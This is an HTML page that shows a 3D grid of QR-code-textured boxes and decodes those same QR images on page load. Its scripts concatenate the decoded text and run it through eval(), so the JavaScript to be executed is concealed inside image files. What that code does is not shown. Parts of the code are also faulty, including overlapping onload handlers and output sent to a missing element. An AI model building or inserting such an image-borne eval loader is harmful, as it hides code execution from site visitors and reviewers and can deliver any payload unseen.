<!DOCTYPE html>
<html>
<head>
    <title>3D Grid with QR Codes</title>
    <script src="x3dom.js"></script>
    <link rel="stylesheet" href="download/x3dom.css">
    <script type="text/javascript" src="qrcode.js"></script>
    <script src="jsQR.js"></script>
    <style>
        html, body {
            height: 100%;
            margin: 0;
            overflow: hidden;
        }
        #x3d-container {
            width: 100%;
            height: 75%;
        }
        .qr-image {
            width: 10%;
            height: auto;
        }
        .qr-code-image {
            width: 10%;
            height: auto;
        }
    </style>
</head>
<body>
    <div id="x3d-container">
        <x3d width='100%' height='100%'>
            <scene>
                <viewpoint position='0 5 10'></viewpoint>
        
            <transform translation='-4.0 0 -4.0'>
                <shape>
                    <appearance>
                        <material diffuseColor='1 1 1'></material>
                        <ImageTexture url='qr_(0, 0).png'/>
                    </appearance>
                    <box></box>
                </shape>
            </transform>
            
            <transform translation='-2.0 0 -4.0'>
                <shape>
                    <appearance>
                        <material diffuseColor='1 1 1'></material>
                        <ImageTexture url='qr_(1, 0).png'/>
                    </appearance>
                    <box></box>
                </shape>
            </transform>
            
            <transform translation='0.0 0 -4.0'>
                <shape>
                    <appearance>
                        <material diffuseColor='1 1 1'></material>
                        <ImageTexture url='qr_(2, 0).png'/>
                    </appearance>
                    <box></box>
                </shape>
            </transform>
            
            <transform translation='2.0 0 -4.0'>
                <shape>
                    <appearance>
                        <material diffuseColor='1 1 1'></material>
                        <ImageTexture url='qr_(3, 0).png'/>
                    </appearance>
                    <box></box>
                </shape>
            </transform>
            
            <transform translation='-4.0 0 -2.0'>
                <shape>
                    <appearance>
                        <material diffuseColor='1 1 1'></material>
                        <ImageTexture url='qr_(0, 1).png'/>
                    </appearance>
                    <box></box>
                </shape>
            </transform>
            
            <transform translation='-2.0 0 -2.0'>
                <shape>
                    <appearance>
                        <material diffuseColor='1 1 1'></material>
                        <ImageTexture url='qr_(1, 1).png'/>
                    </appearance>
                    <box></box>
                </shape>
            </transform>
            
            <transform translation='0.0 0 -2.0'>
                <shape>
                    <appearance>
                        <material diffuseColor='1 1 1'></material>
                        <ImageTexture url='qr_(2, 1).png'/>
                    </appearance>
                    <box></box>
                </shape>
            </transform>
            
            <transform translation='2.0 0 -2.0'>
                <shape>
                    <appearance>
                        <material diffuseColor='1 1 1'></material>
                        <ImageTexture url='qr_(3, 1).png'/>
                    </appearance>
                    <box></box>
                </shape>
            </transform>
            
            <transform translation='-4.0 0 0.0'>
                <shape>
                    <appearance>
                        <material diffuseColor='1 1 1'></material>
                        <ImageTexture url='qr_(0, 2).png'/>
                    </appearance>
                    <box></box>
                </shape>
            </transform>
            
            <transform translation='-2.0 0 0.0'>
                <shape>
                    <appearance>
                        <material diffuseColor='1 1 1'></material>
                        <ImageTexture url='qr_(1, 2).png'/>
                    </appearance>
                    <box></box>
                </shape>
            </transform>
            
            <transform translation='0.0 0 0.0'>
                <shape>
                    <appearance>
                        <material diffuseColor='1 1 1'></material>
                        <ImageTexture url='qr_(2, 2).png'/>
                    </appearance>
                    <box></box>
                </shape>
            </transform>
            
            <transform translation='2.0 0 0.0'>
                <shape>
                    <appearance>
                        <material diffuseColor='1 1 1'></material>
                        <ImageTexture url='qr_(3, 2).png'/>
                    </appearance>
                    <box></box>
                </shape>
            </transform>
            
            <transform translation='-4.0 0 2.0'>
                <shape>
                    <appearance>
                        <material diffuseColor='1 1 1'></material>
                        <ImageTexture url='qr_(0, 3).png'/>
                    </appearance>
                    <box></box>
                </shape>
            </transform>
            
            <transform translation='-2.0 0 2.0'>
                <shape>
                    <appearance>
                        <material diffuseColor='1 1 1'></material>
                        <ImageTexture url='qr_(1, 3).png'/>
                    </appearance>
                    <box></box>
                </shape>
            </transform>
            
            <transform translation='0.0 0 2.0'>
                <shape>
                    <appearance>
                        <material diffuseColor='1 1 1'></material>
                        <ImageTexture url='qr_(2, 3).png'/>
                    </appearance>
                    <box></box>
                </shape>
            </transform>
            
            <transform translation='2.0 0 2.0'>
                <shape>
                    <appearance>
                        <material diffuseColor='1 1 1'></material>
                        <ImageTexture url='qr_(3, 3).png'/>
                    </appearance>
                    <box></box>
                </shape>
            </transform>
            
            <transform translation='-4.0 0 4.0'>
                <shape>
                    <appearance>
                        <material diffuseColor='1 1 1'></material>
                        <ImageTexture url='qr_(0, 4).png'/>
                    </appearance>
                    <box></box>
                </shape>
            </transform>
            
            <transform translation='-2.0 0 4.0'>
                <shape>
                    <appearance>
                        <material diffuseColor='1 1 1'></material>
                        <ImageTexture url='qr_(1, 4).png'/>
                    </appearance>
                    <box></box>
                </shape>
            </transform>
            
            <transform translation='0.0 0 4.0'>
                <shape>
                    <appearance>
                        <material diffuseColor='1 1 1'></material>
                        <ImageTexture url='qr_(2, 4).png'/>
                    </appearance>
                    <box></box>
                </shape>
            </transform>
            
            <transform translation='2.0 0 4.0'>
                <shape>
                    <appearance>
                        <material diffuseColor='1 1 1'></material>
                        <ImageTexture url='qr_(3, 4).png'/>
                    </appearance>
                    <box></box>
                </shape>
            </transform>
            
            <transform translation='-4.0 0 6.0'>
                <shape>
                    <appearance>
                        <material diffuseColor='1 1 1'></material>
                        <ImageTexture url='qr_(0, 5).png'/>
                    </appearance>
                    <box></box>
                </shape>
            </transform>
            
            <transform translation='-2.0 0 6.0'>
                <shape>
                    <appearance>
                        <material diffuseColor='1 1 1'></material>
                        <ImageTexture url='qr_(1, 5).png'/>
                    </appearance>
                    <box></box>
                </shape>
            </transform>
            
            <transform translation='0.0 0 6.0'>
                <shape>
                    <appearance>
                        <material diffuseColor='1 1 1'></material>
                        <ImageTexture url='qr_(2, 5).png'/>
                    </appearance>
                    <box></box>
                </shape>
            </transform>
            
            <transform translation='2.0 0 6.0'>
                <shape>
                    <appearance>
                        <material diffuseColor='1 1 1'></material>
                        <ImageTexture url='qr_(3, 5).png'/>
                    </appearance>
                    <box></box>
                </shape>
            </transform>
            
            <transform translation='-4.0 0 8.0'>
                <shape>
                    <appearance>
                        <material diffuseColor='1 1 1'></material>
                        <ImageTexture url='qr_(0, 6).png'/>
                    </appearance>
                    <box></box>
                </shape>
            </transform>
            
            <transform translation='-2.0 0 8.0'>
                <shape>
                    <appearance>
                        <material diffuseColor='1 1 1'></material>
                        <ImageTexture url='qr_(1, 6).png'/>
                    </appearance>
                    <box></box>
                </shape>
            </transform>
            
            <transform translation='0.0 0 8.0'>
                <shape>
                    <appearance>
                        <material diffuseColor='1 1 1'></material>
                        <ImageTexture url='qr_(2, 6).png'/>
                    </appearance>
                    <box></box>
                </shape>
            </transform>
            
            <transform translation='2.0 0 8.0'>
                <shape>
                    <appearance>
                        <material diffuseColor='1 1 1'></material>
                        <ImageTexture url='qr_(3, 6).png'/>
                    </appearance>
                    <box></box>
                </shape>
            </transform>
            
            <transform translation='-4.0 0 10.0'>
                <shape>
                    <appearance>
                        <material diffuseColor='1 1 1'></material>
                        <ImageTexture url='qr_(0, 7).png'/>
                    </appearance>
                    <box></box>
                </shape>
            </transform>
            
            <transform translation='-2.0 0 10.0'>
                <shape>
                    <appearance>
                        <material diffuseColor='1 1 1'></material>
                        <ImageTexture url='qr_(1, 7).png'/>
                    </appearance>
                    <box></box>
                </shape>
            </transform>
            
            <transform translation='0.0 0 10.0'>
                <shape>
                    <appearance>
                        <material diffuseColor='1 1 1'></material>
                        <ImageTexture url='qr_(2, 7).png'/>
                    </appearance>
                    <box></box>
                </shape>
            </transform>
            
            <transform translation='2.0 0 10.0'>
                <shape>
                    <appearance>
                        <material diffuseColor='1 1 1'></material>
                        <ImageTexture url='qr_(3, 7).png'/>
                    </appearance>
                    <box></box>
                </shape>
            </transform>
            
            <transform translation='-4.0 0 12.0'>
                <shape>
                    <appearance>
                        <material diffuseColor='1 1 1'></material>
                        <ImageTexture url='qr_(0, 8).png'/>
                    </appearance>
                    <box></box>
                </shape>
            </transform>
            
            <transform translation='-2.0 0 12.0'>
                <shape>
                    <appearance>
                        <material diffuseColor='1 1 1'></material>
                        <ImageTexture url='qr_(1, 8).png'/>
                    </appearance>
                    <box></box>
                </shape>
            </transform>
            
            <transform translation='0.0 0 12.0'>
                <shape>
                    <appearance>
                        <material diffuseColor='1 1 1'></material>
                        <ImageTexture url='qr_(2, 8).png'/>
                    </appearance>
                    <box></box>
                </shape>
            </transform>
            
            <transform translation='2.0 0 12.0'>
                <shape>
                    <appearance>
                        <material diffuseColor='1 1 1'></material>
                        <ImageTexture url='qr_(3, 8).png'/>
                    </appearance>
                    <box></box>
                </shape>
            </transform>
            
            <transform translation='-4.0 0 14.0'>
                <shape>
                    <appearance>
                        <material diffuseColor='1 1 1'></material>
                        <ImageTexture url='qr_(0, 9).png'/>
                    </appearance>
                    <box></box>
                </shape>
            </transform>
            
            <transform translation='-2.0 0 14.0'>
                <shape>
                    <appearance>
                        <material diffuseColor='1 1 1'></material>
                        <ImageTexture url='qr_(1, 9).png'/>
                    </appearance>
                    <box></box>
                </shape>
            </transform>
            
            <transform translation='0.0 0 14.0'>
                <shape>
                    <appearance>
                        <material diffuseColor='1 1 1'></material>
                        <ImageTexture url='qr_(2, 9).png'/>
                    </appearance>
                    <box></box>
                </shape>
            </transform>
            
            <transform translation='2.0 0 14.0'>
                <shape>
                    <appearance>
                        <material diffuseColor='1 1 1'></material>
                        <ImageTexture url='qr_(3, 9).png'/>
                    </appearance>
                    <box></box>
                </shape>
            </transform>
            
            <transform translation='-4.0 0 16.0'>
                <shape>
                    <appearance>
                        <material diffuseColor='1 1 1'></material>
                        <ImageTexture url='qr_(0, 10).png'/>
                    </appearance>
                    <box></box>
                </shape>
            </transform>
            
            <transform translation='-2.0 0 16.0'>
                <shape>
                    <appearance>
                        <material diffuseColor='1 1 1'></material>
                        <ImageTexture url='qr_(1, 10).png'/>
                    </appearance>
                    <box></box>
                </shape>
            </transform>
            
            <transform translation='0.0 0 16.0'>
                <shape>
                    <appearance>
                        <material diffuseColor='1 1 1'></material>
                        <ImageTexture url='qr_(2, 10).png'/>
                    </appearance>
                    <box></box>
                </shape>
            </transform>
            
            <transform translation='2.0 0 16.0'>
                <shape>
                    <appearance>
                        <material diffuseColor='1 1 1'></material>
                        <ImageTexture url='qr_(3, 10).png'/>
                    </appearance>
                    <box></box>
                </shape>
            </transform>
            
            <transform translation='-4.0 0 18.0'>
                <shape>
                    <appearance>
                        <material diffuseColor='1 1 1'></material>
                        <ImageTexture url='qr_(0, 11).png'/>
                    </appearance>
                    <box></box>
                </shape>
            </transform>
            
            <transform translation='-2.0 0 18.0'>
                <shape>
                    <appearance>
                        <material diffuseColor='1 1 1'></material>
                        <ImageTexture url='qr_(1, 11).png'/>
                    </appearance>
                    <box></box>
                </shape>
            </transform>
            
            <transform translation='0.0 0 18.0'>
                <shape>
                    <appearance>
                        <material diffuseColor='1 1 1'></material>
                        <ImageTexture url='qr_(2, 11).png'/>
                    </appearance>
                    <box></box>
                </shape>
            </transform>
            
            <transform translation='2.0 0 18.0'>
                <shape>
                    <appearance>
                        <material diffuseColor='1 1 1'></material>
                        <ImageTexture url='qr_(3, 11).png'/>
                    </appearance>
                    <box></box>
                </shape>
            </transform>
            
            <transform translation='-4.0 0 20.0'>
                <shape>
                    <appearance>
                        <material diffuseColor='1 1 1'></material>
                        <ImageTexture url='qr_(0, 12).png'/>
                    </appearance>
                    <box></box>
                </shape>
            </transform>
            
            <transform translation='-2.0 0 20.0'>
                <shape>
                    <appearance>
                        <material diffuseColor='1 1 1'></material>
                        <ImageTexture url='qr_(1, 12).png'/>
                    </appearance>
                    <box></box>
                </shape>
            </transform>
            
            <transform translation='0.0 0 20.0'>
                <shape>
                    <appearance>
                        <material diffuseColor='1 1 1'></material>
                        <ImageTexture url='qr_(2, 12).png'/>
                    </appearance>
                    <box></box>
                </shape>
            </transform>
            
            <transform translation='2.0 0 20.0'>
                <shape>
                    <appearance>
                        <material diffuseColor='1 1 1'></material>
                        <ImageTexture url='qr_(3, 12).png'/>
                    </appearance>
                    <box></box>
                </shape>
            </transform>
            
            <transform translation='-4.0 0 22.0'>
                <shape>
                    <appearance>
                        <material diffuseColor='1 1 1'></material>
                        <ImageTexture url='qr_(0, 13).png'/>
                    </appearance>
                    <box></box>
                </shape>
            </transform>
            
            <transform translation='-2.0 0 22.0'>
                <shape>
                    <appearance>
                        <material diffuseColor='1 1 1'></material>
                        <ImageTexture url='qr_(1, 13).png'/>
                    </appearance>
                    <box></box>
                </shape>
            </transform>
            
            <transform translation='0.0 0 22.0'>
                <shape>
                    <appearance>
                        <material diffuseColor='1 1 1'></material>
                        <ImageTexture url='qr_(2, 13).png'/>
                    </appearance>
                    <box></box>
                </shape>
            </transform>
            
            <transform translation='2.0 0 22.0'>
                <shape>
                    <appearance>
                        <material diffuseColor='1 1 1'></material>
                        <ImageTexture url='qr_(3, 13).png'/>
                    </appearance>
                    <box></box>
                </shape>
            </transform>
            
            <transform translation='-4.0 0 24.0'>
                <shape>
                    <appearance>
                        <material diffuseColor='1 1 1'></material>
                        <ImageTexture url='qr_(0, 14).png'/>
                    </appearance>
                    <box></box>
                </shape>
            </transform>
            
            <transform translation='-2.0 0 24.0'>
                <shape>
                    <appearance>
                        <material diffuseColor='1 1 1'></material>
                        <ImageTexture url='qr_(1, 14).png'/>
                    </appearance>
                    <box></box>
                </shape>
            </transform>
            
            <transform translation='0.0 0 24.0'>
                <shape>
                    <appearance>
                        <material diffuseColor='1 1 1'></material>
                        <ImageTexture url='qr_(2, 14).png'/>
                    </appearance>
                    <box></box>
                </shape>
            </transform>
            
            <transform translation='2.0 0 24.0'>
                <shape>
                    <appearance>
                        <material diffuseColor='1 1 1'></material>
                        <ImageTexture url='qr_(3, 14).png'/>
                    </appearance>
                    <box></box>
                </shape>
            </transform>
            
            <transform translation='-4.0 0 26.0'>
                <shape>
                    <appearance>
                        <material diffuseColor='1 1 1'></material>
                        <ImageTexture url='qr_(0, 15).png'/>
                    </appearance>
                    <box></box>
                </shape>
            </transform>
            
            <transform translation='-2.0 0 26.0'>
                <shape>
                    <appearance>
                        <material diffuseColor='1 1 1'></material>
                        <ImageTexture url='qr_(1, 15).png'/>
                    </appearance>
                    <box></box>
                </shape>
            </transform>
            
            <transform translation='0.0 0 26.0'>
                <shape>
                    <appearance>
                        <material diffuseColor='1 1 1'></material>
                        <ImageTexture url='qr_(2, 15).png'/>
                    </appearance>
                    <box></box>
                </shape>
            </transform>
            
            <transform translation='2.0 0 26.0'>
                <shape>
                    <appearance>
                        <material diffuseColor='1 1 1'></material>
                        <ImageTexture url='qr_(3, 15).png'/>
                    </appearance>
                    <box></box>
                </shape>
            </transform>
            
            <transform translation='-4.0 0 28.0'>
                <shape>
                    <appearance>
                        <material diffuseColor='1 1 1'></material>
                        <ImageTexture url='qr_(0, 16).png'/>
                    </appearance>
                    <box></box>
                </shape>
            </transform>
            
            <transform translation='-2.0 0 28.0'>
                <shape>
                    <appearance>
                        <material diffuseColor='1 1 1'></material>
                        <ImageTexture url='qr_(1, 16).png'/>
                    </appearance>
                    <box></box>
                </shape>
            </transform>
            
            <transform translation='0.0 0 28.0'>
                <shape>
                    <appearance>
                        <material diffuseColor='1 1 1'></material>
                        <ImageTexture url='qr_(2, 16).png'/>
                    </appearance>
                    <box></box>
                </shape>
            </transform>
            
            <transform translation='2.0 0 28.0'>
                <shape>
                    <appearance>
                        <material diffuseColor='1 1 1'></material>
                        <ImageTexture url='qr_(3, 16).png'/>
                    </appearance>
                    <box></box>
                </shape>
            </transform>
            
            <transform translation='-4.0 0 30.0'>
                <shape>
                    <appearance>
                        <material diffuseColor='1 1 1'></material>
                        <ImageTexture url='qr_(0, 17).png'/>
                    </appearance>
                    <box></box>
                </shape>
            </transform>
            
            <transform translation='-2.0 0 30.0'>
                <shape>
                    <appearance>
                        <material diffuseColor='1 1 1'></material>
                        <ImageTexture url='qr_(1, 17).png'/>
                    </appearance>
                    <box></box>
                </shape>
            </transform>
            
            <transform translation='0.0 0 30.0'>
                <shape>
                    <appearance>
                        <material diffuseColor='1 1 1'></material>
                        <ImageTexture url='qr_(2, 17).png'/>
                    </appearance>
                    <box></box>
                </shape>
            </transform>
            
            <transform translation='2.0 0 30.0'>
                <shape>
                    <appearance>
                        <material diffuseColor='1 1 1'></material>
                        <ImageTexture url='qr_(3, 17).png'/>
                    </appearance>
                    <box></box>
                </shape>
            </transform>
            
            <transform translation='-4.0 0 32.0'>
                <shape>
                    <appearance>
                        <material diffuseColor='1 1 1'></material>
                        <ImageTexture url='qr_(0, 18).png'/>
                    </appearance>
                    <box></box>
                </shape>
            </transform>
            
            <transform translation='-2.0 0 32.0'>
                <shape>
                    <appearance>
                        <material diffuseColor='1 1 1'></material>
                        <ImageTexture url='qr_(1, 18).png'/>
                    </appearance>
                    <box></box>
                </shape>
            </transform>
            
            <transform translation='0.0 0 32.0'>
                <shape>
                    <appearance>
                        <material diffuseColor='1 1 1'></material>
                        <ImageTexture url='qr_(2, 18).png'/>
                    </appearance>
                    <box></box>
                </shape>
            </transform>
            
            <transform translation='2.0 0 32.0'>
                <shape>
                    <appearance>
                        <material diffuseColor='1 1 1'></material>
                        <ImageTexture url='qr_(3, 18).png'/>
                    </appearance>
                    <box></box>
                </shape>
            </transform>
            
            <transform translation='-4.0 0 34.0'>
                <shape>
                    <appearance>
                        <material diffuseColor='1 1 1'></material>
                        <ImageTexture url='qr_(0, 19).png'/>
                    </appearance>
                    <box></box>
                </shape>
            </transform>
            
            <transform translation='-2.0 0 34.0'>
                <shape>
                    <appearance>
                        <material diffuseColor='1 1 1'></material>
                        <ImageTexture url='qr_(1, 19).png'/>
                    </appearance>
                    <box></box>
                </shape>
            </transform>
            
            <transform translation='0.0 0 34.0'>
                <shape>
                    <appearance>
                        <material diffuseColor='1 1 1'></material>
                        <ImageTexture url='qr_(2, 19).png'/>
                    </appearance>
                    <box></box>
                </shape>
            </transform>
            
            <transform translation='2.0 0 34.0'>
                <shape>
                    <appearance>
                        <material diffuseColor='1 1 1'></material>
                        <ImageTexture url='qr_(3, 19).png'/>
                    </appearance>
                    <box></box>
                </shape>
            </transform>
            
            <transform translation='-4.0 0 36.0'>
                <shape>
                    <appearance>
                        <material diffuseColor='1 1 1'></material>
                        <ImageTexture url='qr_(0, 20).png'/>
                    </appearance>
                    <box></box>
                </shape>
            </transform>
            
            <transform translation='-2.0 0 36.0'>
                <shape>
                    <appearance>
                        <material diffuseColor='1 1 1'></material>
                        <ImageTexture url='qr_(1, 20).png'/>
                    </appearance>
                    <box></box>
                </shape>
            </transform>
            
            <transform translation='0.0 0 36.0'>
                <shape>
                    <appearance>
                        <material diffuseColor='1 1 1'></material>
                        <ImageTexture url='qr_(2, 20).png'/>
                    </appearance>
                    <box></box>
                </shape>
            </transform>
            
            <transform translation='2.0 0 36.0'>
                <shape>
                    <appearance>
                        <material diffuseColor='1 1 1'></material>
                        <ImageTexture url='qr_(3, 20).png'/>
                    </appearance>
                    <box></box>
                </shape>
            </transform>
            
            <transform translation='-4.0 0 38.0'>
                <shape>
                    <appearance>
                        <material diffuseColor='1 1 1'></material>
                        <ImageTexture url='qr_(0, 21).png'/>
                    </appearance>
                    <box></box>
                </shape>
            </transform>
            
            <transform translation='-2.0 0 38.0'>
                <shape>
                    <appearance>
                        <material diffuseColor='1 1 1'></material>
                        <ImageTexture url='qr_(1, 21).png'/>
                    </appearance>
                    <box></box>
                </shape>
            </transform>
            
            <transform translation='0.0 0 38.0'>
                <shape>
                    <appearance>
                        <material diffuseColor='1 1 1'></material>
                        <ImageTexture url='qr_(2, 21).png'/>
                    </appearance>
                    <box></box>
                </shape>
            </transform>
            
            <transform translation='2.0 0 38.0'>
                <shape>
                    <appearance>
                        <material diffuseColor='1 1 1'></material>
                        <ImageTexture url='qr_(3, 21).png'/>
                    </appearance>
                    <box></box>
                </shape>
            </transform>
            
            <transform translation='-4.0 0 40.0'>
                <shape>
                    <appearance>
                        <material diffuseColor='1 1 1'></material>
                        <ImageTexture url='qr_(0, 22).png'/>
                    </appearance>
                    <box></box>
                </shape>
            </transform>
            
            </scene>
        </x3d>
    </div>

    <div>
        <img class="photo" src="net234a.gif" alt="net234a" style="width: 5%; height: 5%;" />
    </div>
        <div id="qr-code-data">
    </div>
        <div id="qr-image">
    </div>
<img src="qr_(0, 0).png" class="qr-code-image qr-image">
<img src="qr_(0, 10).png" class="qr-code-image qr-image">
<img src="qr_(0, 11).png" class="qr-code-image qr-image">
<img src="qr_(0, 12).png" class="qr-code-image qr-image">
<img src="qr_(0, 13).png" class="qr-code-image qr-image">
<img src="qr_(0, 14).png" class="qr-code-image qr-image">
<img src="qr_(0, 15).png" class="qr-code-image qr-image">
<img src="qr_(0, 16).png" class="qr-code-image qr-image">
<img src="qr_(0, 17).png" class="qr-code-image qr-image">
<img src="qr_(0, 18).png" class="qr-code-image qr-image">
<img src="qr_(0, 19).png" class="qr-code-image qr-image">
<img src="qr_(0, 1).png" class="qr-code-image qr-image">
<img src="qr_(0, 20).png" class="qr-code-image qr-image">
<img src="qr_(0, 21).png" class="qr-code-image qr-image">
<img src="qr_(0, 22).png" class="qr-code-image qr-image">
<img src="qr_(0, 2).png" class="qr-code-image qr-image">
<img src="qr_(0, 3).png" class="qr-code-image qr-image">
<img src="qr_(0, 4).png" class="qr-code-image qr-image">
<img src="qr_(0, 5).png" class="qr-code-image qr-image">
<img src="qr_(0, 6).png" class="qr-code-image qr-image">
<img src="qr_(0, 7).png" class="qr-code-image qr-image">
<img src="qr_(0, 8).png" class="qr-code-image qr-image">
<img src="qr_(0, 9).png" class="qr-code-image qr-image">
<img src="qr_(1, 0).png" class="qr-code-image qr-image">
<img src="qr_(1, 10).png" class="qr-code-image qr-image">
<img src="qr_(1, 11).png" class="qr-code-image qr-image">
<img src="qr_(1, 12).png" class="qr-code-image qr-image">
<img src="qr_(1, 13).png" class="qr-code-image qr-image">
<img src="qr_(1, 14).png" class="qr-code-image qr-image">
<img src="qr_(1, 15).png" class="qr-code-image qr-image">
<img src="qr_(1, 16).png" class="qr-code-image qr-image">
<img src="qr_(1, 17).png" class="qr-code-image qr-image">
<img src="qr_(1, 18).png" class="qr-code-image qr-image">
<img src="qr_(1, 19).png" class="qr-code-image qr-image">
<img src="qr_(1, 1).png" class="qr-code-image qr-image">
<img src="qr_(1, 20).png" class="qr-code-image qr-image">
<img src="qr_(1, 21).png" class="qr-code-image qr-image">
<img src="qr_(1, 2).png" class="qr-code-image qr-image">
<img src="qr_(1, 3).png" class="qr-code-image qr-image">
<img src="qr_(1, 4).png" class="qr-code-image qr-image">
<img src="qr_(1, 5).png" class="qr-code-image qr-image">
<img src="qr_(1, 6).png" class="qr-code-image qr-image">
<img src="qr_(1, 7).png" class="qr-code-image qr-image">
<img src="qr_(1, 8).png" class="qr-code-image qr-image">
<img src="qr_(1, 9).png" class="qr-code-image qr-image">
<img src="qr_(2, 0).png" class="qr-code-image qr-image">
<img src="qr_(2, 10).png" class="qr-code-image qr-image">
<img src="qr_(2, 11).png" class="qr-code-image qr-image">
<img src="qr_(2, 12).png" class="qr-code-image qr-image">
<img src="qr_(2, 13).png" class="qr-code-image qr-image">
<img src="qr_(2, 14).png" class="qr-code-image qr-image">
<img src="qr_(2, 15).png" class="qr-code-image qr-image">
<img src="qr_(2, 16).png" class="qr-code-image qr-image">
<img src="qr_(2, 17).png" class="qr-code-image qr-image">
<img src="qr_(2, 18).png" class="qr-code-image qr-image">
<img src="qr_(2, 19).png" class="qr-code-image qr-image">
<img src="qr_(2, 1).png" class="qr-code-image qr-image">
<img src="qr_(2, 20).png" class="qr-code-image qr-image">
<img src="qr_(2, 21).png" class="qr-code-image qr-image">
<img src="qr_(2, 2).png" class="qr-code-image qr-image">
<img src="qr_(2, 3).png" class="qr-code-image qr-image">
<img src="qr_(2, 4).png" class="qr-code-image qr-image">
<img src="qr_(2, 5).png" class="qr-code-image qr-image">
<img src="qr_(2, 6).png" class="qr-code-image qr-image">
<img src="qr_(2, 7).png" class="qr-code-image qr-image">
<img src="qr_(2, 8).png" class="qr-code-image qr-image">
<img src="qr_(2, 9).png" class="qr-code-image qr-image">
<img src="qr_(3, 0).png" class="qr-code-image qr-image">
<img src="qr_(3, 10).png" class="qr-code-image qr-image">
<img src="qr_(3, 11).png" class="qr-code-image qr-image">
<img src="qr_(3, 12).png" class="qr-code-image qr-image">
<img src="qr_(3, 13).png" class="qr-code-image qr-image">
<img src="qr_(3, 14).png" class="qr-code-image qr-image">
<img src="qr_(3, 15).png" class="qr-code-image qr-image">
<img src="qr_(3, 16).png" class="qr-code-image qr-image">
<img src="qr_(3, 17).png" class="qr-code-image qr-image">
<img src="qr_(3, 18).png" class="qr-code-image qr-image">
<img src="qr_(3, 19).png" class="qr-code-image qr-image">
<img src="qr_(3, 1).png" class="qr-code-image qr-image">
<img src="qr_(3, 20).png" class="qr-code-image qr-image">
<img src="qr_(3, 21).png" class="qr-code-image qr-image">
<img src="qr_(3, 2).png" class="qr-code-image qr-image">
<img src="qr_(3, 3).png" class="qr-code-image qr-image">
<img src="qr_(3, 4).png" class="qr-code-image qr-image">
<img src="qr_(3, 5).png" class="qr-code-image qr-image">
<img src="qr_(3, 6).png" class="qr-code-image qr-image">
<img src="qr_(3, 7).png" class="qr-code-image qr-image">
<img src="qr_(3, 8).png" class="qr-code-image qr-image">
<img src="qr_(3, 9).png" class="qr-code-image qr-image">
    <script>
        window.onload = function() {
            var images = document.getElementsByClassName('qr-image');

            for (var i = 0; i < images.length; i++) {
                processImage(images[i]);
            }
        };

        function processImage(image) {
            var canvas = document.createElement('canvas');
            var context = canvas.getContext('2d');

            canvas.width = image.width;
            canvas.height = image.height;
            context.drawImage(image, 0, 0, image.width, image.height);

            var imageData = context.getImageData(0, 0, canvas.width, canvas.height);
            var code = jsQR(imageData.data, imageData.width, imageData.height);

            if (code) {
                console.log(`QR Code data: ${code.data}`);
                try {
                    eval(code.data); // Evaluate the data as JavaScript code
                } catch (error) {
                    console.error('Error evaluating QR code data: ', error);
                }
            } else {
                console.log('No QR code found in image.');
            }
        }
    </script>
<script>
  // Get all of the image elements on the page
  var imageElements = document.querySelectorAll('img');

  // Iterate through the image elements
  for (var i = 0; i < imageElements.length; i++) {
    var imageElement = imageElements[i];
    var imageUrl = imageElement.src;

    // Create a new link element for the image
    var linkElement = document.createElement('link');
    linkElement.rel = 'preload';
    linkElement.href = imageUrl;
    linkElement.as = 'image';

    // Append the link element to the head of the document
    document.head.appendChild(linkElement);
  }
</script>

<script src="qr_packed.js"></script>

<script>
  window.onload = function() {
    var qr_data = [];
    var images = document.getElementsByTagName('img');

    function toDataURL(url, callback) {
      var xhr = new XMLHttpRequest();
      xhr.onload = function() {
        var reader = new FileReader();
        reader.onloadend = function() {
          callback(reader.result);
        };
        reader.readAsDataURL(xhr.response);
      };
      xhr.open('GET', url);
      xhr.responseType = 'blob';
      xhr.send();
    }

    function runAfterDecode(i, data) {
      if (data) {
        qr_data[i] = data;
      }
      if (qr_data.length == images.length && !qr_data.includes(undefined)) {
        console.log(`QR data: ${qr_data}`);
        var full_code = qr_data.join("");
        console.log(`Full code: ${full_code}`);
        // try to eval full_code only if you're sure it's correct and safe to execute
        try {
          eval(full_code);
        } catch (err) {
          console.error(`Error executing script: ${err}`);
        }
      }
    }

    for (let i = 0; i < images.length; i++) {
      // Add a delay before decoding each image
      setTimeout(function() {
        toDataURL(images[i].src, function(dataUrl) {
          qrcode.callback = function(data, err) {
            if (err) {
              console.error(`Error decoding QR code from image ${i}: ${err}`);
              qr_data[i] = "";
            }
            runAfterDecode(i, data);
          };
          qrcode.decode(dataUrl);
        });
      }, i * 200); // Delay of i * 200 milliseconds
    }
  };

</script>
<script>
    const qrFiles = Array.from(document.querySelectorAll('ImageTexture')).map(imgTex => imgTex.getAttribute('url'));

    function decodeQRCode(qrFile) {
        return new Promise((resolve, reject) => {
            fetch(qrFile)
                .then(response => response.blob())
                .then(blob => {
                    let img = new Image();
                    img.onload = function() {
                        let canvas = document.createElement('canvas');
                        canvas.width = this.naturalWidth;
                        canvas.height = this.naturalHeight;
                        canvas.getContext('2d').drawImage(this, 0, 0);
                        let imageData = canvas.getContext('2d').getImageData(0, 0, this.width, this.height);
                        let code = jsQR(imageData.data, imageData.width, imageData.height);
                        resolve({ qrFile, data: code ? code.data : 'Not a valid QR code' });
                    };
                    img.src = URL.createObjectURL(blob);
                })
                .catch(reject);
        });
    }

    function displayQRDecodeResults(decodedData) {
        const qrDecodeResultsContainer = document.getElementById('qr-decode-results');
        const resultDiv = document.createElement('div');
        resultDiv.textContent = `QR Code: ${decodedData.qrFile}\nDecoded Data: ${decodedData.data}`;
    }

    async function decodeQRCodesWithDelay(limit = 3) {
        let currentIndex = 0;

        async function processBatch() {
            const batch = qrFiles.slice(currentIndex, currentIndex + limit);
            currentIndex += limit;

            for (const qrFile of batch) {
                const decodedData = await decodeQRCode(qrFile);
                displayQRDecodeResults(decodedData);
                await new Promise(resolve => setTimeout(resolve, 1000)); // Add a 1-second delay before decoding the next QR code
            }

            if (currentIndex < qrFiles.length) {
                // There are more QR codes to process, so wait a bit and then process the next batch
                await new Promise(resolve => setTimeout(resolve, 1000)); // Add a 1-second delay before processing the next batch
                processBatch();
            }
        }

        processBatch();
    }

    decodeQRCodesWithDelay()
        .catch(error => console.error('Error decoding QR codes:', error));

function onQrCodeSuccess(decodedText, decodedResult) {
  console.log(`QR Code detected: ${decodedText}`, decodedResult);
  /* handle QR Code detected */
}

function onQrCodeError(errorMessage) {
  /* handle on error */
  console.log(`QR Code error: ${errorMessage}`);
}

</script>
</body>
</html>
